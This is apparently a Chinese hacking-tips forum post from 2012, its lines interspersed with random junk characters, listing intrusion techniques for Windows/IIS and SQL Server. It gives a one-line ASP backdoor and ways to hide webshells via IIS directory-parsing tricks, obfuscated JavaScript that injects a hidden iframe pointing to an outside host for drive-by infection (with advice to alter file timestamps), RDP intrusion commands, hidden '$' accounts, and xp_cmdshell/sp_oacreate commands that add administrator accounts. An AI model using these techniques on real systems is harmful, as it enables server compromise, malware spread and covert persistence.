! {' [; p/ [: S3 g4 I用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。7 ^: O J9 D! @( j' e/ `- m% Y4 Y
3 f4 d' N% j$ ^' b7 [2 B) W' v53、隐藏ASP后门的两种方法
, J) V9 Z+ q+ L2 \4 m- Z4 y1 X1、建立非标准目录:mkdir images..\
8 ]& b7 }# W( ]拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
- Z' j) l$ f* e7 M, X通过web访问ASP木马:http://ip/images../news.asp?action=login
0 u+ k3 ^7 i5 d# }如何删除非标准目录:rmdir images..\ /s
, b( C/ _! ^- S2 s, c. m2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
$ V; l' t, s% e! H6 wmkdir programme.asp
! q( j, q) n, s* [# G" m新建1.txt文件内容:<!--#include file=”12.jpg”-->" ~% Z8 R* H6 S: k1 M
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ O/ H5 k& i. w( i5 {- O7 o# g$ Z0 W
attrib +H +S programme.asp
; K4 ^% E* }% p d; p. f7 z4 Q) v% c1 i通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt' o& ?3 R/ H3 g# H; ^! F) ]
4 b$ `8 z' C6 N8 W8 s$ `4 o54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
p) O# ?+ L& S4 G4 y然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。! m; l2 j9 D: T. S( ?- @6 s( O
3 P0 @5 N/ D, w1 X
55、JS隐蔽挂马& m! r( [8 A. K* T* q/ E- ?9 o9 {
1.
0 S2 `" G, n1 ~( Q! ivar tr4c3="<iframe src=ht";
) i/ a% p2 ?& t; D6 X% {tr4c3 = tr4c3+"tp:/";; ?# N. {8 a- R1 @* Z
tr4c3 = tr4c3+"/ww";
! ^7 j) y8 ^1 l4 p' G( Xtr4c3 = tr4c3+"w.tr4";
5 ]0 J- }. C) i9 i! O% y. _tr4c3 = tr4c3+"c3.com/inc/m";
1 ]5 _, p: f; H9 ?% Otr4c3 = tr4c3+"m.htm style="display:none"></i";+ U- Q$ S& G5 y
tr4c3 =tr4c3+"frame>'";
9 G2 ?( v" m. Adocument.write(tr4c3);, w+ u6 c* [# X* u; n3 h3 a4 M3 G
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
6 Y# ]4 B) k: j& k
: d$ S" {9 z5 l2.
/ m+ V x1 Q8 e# C( e转换进制,然后用EVAL执行。如+ u8 Y3 [% q* G
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");9 d' T1 E- d# }4 K2 a P$ V
不过这个有点显眼。& q# m. {- `5 d! B
3.% p8 \* }8 q, _1 x; E- W
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');' r( r3 |3 H8 v4 }& f; H
最后一点,别忘了把文件的时间也修改下。8 d1 u: E3 }3 y' @" n
: w6 k; U: ~& |2 d A2 Q56.3389终端入侵常用DOS命令
6 t$ o) [6 l- Htaskkill taskkill /PID 1248 /t q% C! t% ^+ R& s' o
% R" m) m z6 v! \1 o8 g0 w) Z9 Ytasklist 查进程) c" O# E7 C( R
+ M. a4 Y0 _1 c% J% r Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限. N3 \( A1 k$ ?
iisreset /reboot
3 V$ ?4 v8 s( R0 C2 `$ ptsshutdn /reboot /delay:1 重起服务器
" ? g, S1 ` `2 V, |
4 U1 p" e- x0 B: J, k: d) c! |logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. n; `- c- E; X! M: t' z
. J2 t2 H' O5 f$ q) uquery user 查看当前终端用户在线情况
; V9 T4 @6 L# X y. i
2 f6 s$ r5 e; x2 l' b要显示有关所有会话使用的进程的信息,请键入:query process *4 N' |9 V. F5 j, z! t
. Q$ L9 ^ @4 w& W3 ~) s
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, [ G! p/ l, |4 @0 X4 `) r: X8 F: {6 b' |
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' N2 C9 _$ K. d( Q* K- I7 c5 K6 |/ R7 R% h( F" v/ D% B/ t/ s" L
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
; T$ A8 z$ L2 m4 A7 {! M B; F% O0 ?: G% b, M* b, U
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( X/ ^3 \) V& c) [
. C0 [0 c" G0 \( `3 _. E命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统9 p" p* w9 e! \$ f
7 |2 N7 p) K( [命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; L) q) T8 X" O* \, i' v
- \% e( v7 }/ p+ e n5 N# g命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( W0 D) K/ t. ^
- {/ d, |" J5 a7 d7 x0 I: `56、在地址栏或按Ctrl+O,输入:
; X+ ?9 g0 c3 m0 r1 a# rjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 {( f R5 G9 z O& Y. ^" t; U
7 c: R% n0 x( S# G6 a, ?4 B
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% I* b; K# S2 j5 v
7 S$ L7 d4 d0 d! m$ K" r57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 q% q" ^( F. l) u- P* k
用net localgroup administrators是可以看到管理组下,加了$的用户的。+ \* g: q) G# e/ Z5 [
1 d$ z! x- J, V% A6 o' T
58、 sa弱口令相关命令, E' p) U' d, U$ @. `2 t
) H) S0 X, q# ]; k( V4 `一.更改sa口令方法:$ v. a7 s* x3 M) G/ u( l9 `
用sql综合利用工具连接后,执行命令:+ s, r$ v8 _% P2 f8 S8 a# f" O
exec sp_password NULL,'20001001','sa'( p& |: j- y, e. p
(提示:慎用!)# Q4 t/ ~: O; `7 C& r% B( _
! W+ @# y- `# W二.简单修补sa弱口令.( R! m7 B6 ~; z0 @# V
. W7 y7 m4 J! ]9 {方法1:查询分离器连接后执行:
' Y+ X5 g# j1 ]: w' Cif exists (select * from
4 [- {& W1 \$ o# n, Y/ ^1 _dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
3 |/ {% j1 i, D2 cOBJECTPROPERTY(id, N'IsExtendedProc') = 1)1 j/ r. s- V3 k# L" m3 }( J! n$ q
' h [. S, V% K" j9 y4 oexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
+ [2 |- y' Y H5 v7 z7 e3 A0 k2 k
. ~" s6 ^7 e6 [! x7 L aGO
0 x; T8 _+ i* m, @# n, K
; j$ o5 H- K, h7 W然后按F5键命令执行完毕8 r, L; \" i3 ~" v$ ~
+ |+ C% ?% `( e方法2:查询分离器连接后" Z8 V0 ~* t* f: b! I
第一步执行:use master
" K+ h- }4 c6 A) U) N8 ^; r第二步执行:sp_dropextendedproc 'xp_cmdshell'
5 v2 D4 ?& p: j- }* j4 T* R- G/ L, N然后按F5键命令执行完毕
) V. t6 b# Z* Y! g& [
$ R3 ]% p) f4 ?" r$ m$ {
1 U: |8 O; U! k& e5 h; j5 T2 g2 \三.常见情况恢复执行xp_cmdshell.' ]) b R" J! `- e
* O8 z e; x7 B, t! T i6 G
# X2 S' x# Q+ n1 未能找到存储过程'master..xpcmdshell'.
, p1 g4 Y# O) n$ v 恢复方法:查询分离器连接后,
; u: e+ k/ O3 {第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 m% ~; u2 F6 P1 `
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'8 B+ q5 |5 G2 S" D8 H: p
然后按F5键命令执行完毕# N, o# V+ b# w; S3 _
; x9 w+ P0 M! f7 a; ?( `; K: `8 h2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, f6 I2 _; L0 m恢复方法:查询分离器连接后,
j6 }4 ]' p9 Q2 P M' v( _第一步执行:sp_dropextendedproc "xp_cmdshell"
3 N4 l* R. d( X4 \! w第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 x( k6 n$ _6 o) J" b0 e+ E2 V
然后按F5键命令执行完毕
5 q& r5 z* s' }( x0 X p1 v
, a4 Z k& A* p1 ^3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)3 h3 p6 Q; l0 O1 S3 A/ ~8 B
恢复方法:查询分离器连接后,
! H3 Q" N) V1 W6 m! d2 A第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
0 q% |4 |( u" ]! T: \第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' + } c7 G; a1 B# Z1 f/ d
然后按F5键命令执行完毕
! D2 B: c: H; x$ I1 a
( P% e( ]# A8 b) e/ L0 [: A3 K+ x四.终极方法.5 w$ J h: Q4 q
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! D5 L. L; U: B) H/ X
查询分离器连接后,
) g( R2 p% {9 v( @8 Z0 D4 ]# U1 h2000servser系统:
1 D/ f/ [: }, @1 `8 K% `/ ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ a- ~9 E% X& W6 ]8 o- K1 z
. K) C; H1 _' M) m! p0 v% @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 ^/ W1 e b: ~: D( v, u# [
( h% w+ @ u. ~3 @xp或2003server系统:
! ]) @! @/ a: V3 U7 P; g3 n6 |1 @* c3 [( O( C( [ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'$ ~; ~5 j: \& j3 v# w- l
5 l/ O# q: G7 _5 x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 k0 B" M' t) h |
发表于 2012-9-15 14:51:03
收藏
支持
反对